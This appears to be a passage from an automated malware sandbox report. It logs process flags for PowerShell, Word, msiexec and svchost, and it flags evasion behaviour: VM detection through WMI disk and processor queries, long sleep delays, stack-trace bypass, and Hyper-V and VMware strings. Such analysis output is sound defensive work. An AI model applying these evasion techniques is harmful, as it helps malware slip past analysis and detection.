                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT caption, serialnumber FROM Win32_DiskDrive
                        Switches to a custom stack to bypass stack traces
                        Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                        Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                        Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 4D9B83A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3944Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5929Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5663Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3992Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7249Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2581Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\wscript.exe TID: 7860Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8060Thread sleep count: 5663 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8064Thread sleep count: 3992 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7356Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 7860Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: wscript.exe, 00000003.00000002.1822846195.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1798263879.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1801147978.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1818795448.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1800752301.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1799076333.00000273F06A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWm
                        Source: msiexec.exe, 00000013.00000003.2326506772.0000000023000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                        Source: wscript.exe, 00000003.00000002.1822846195.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1798263879.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1801147978.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1820273002.00000273F0628000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1799425978.00000273F0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1818795448.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1822846195.00000273F0628000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1800752301.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1799076333.00000273F06A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1799585945.00000273F0638000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.3027616986.0000017D1B65A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: wscript.exe, 00000003.00000002.1823536963.00000273F0710000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\r1
                        Source: msiexec.exe, 00000013.00000003.2326506772.0000000023000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
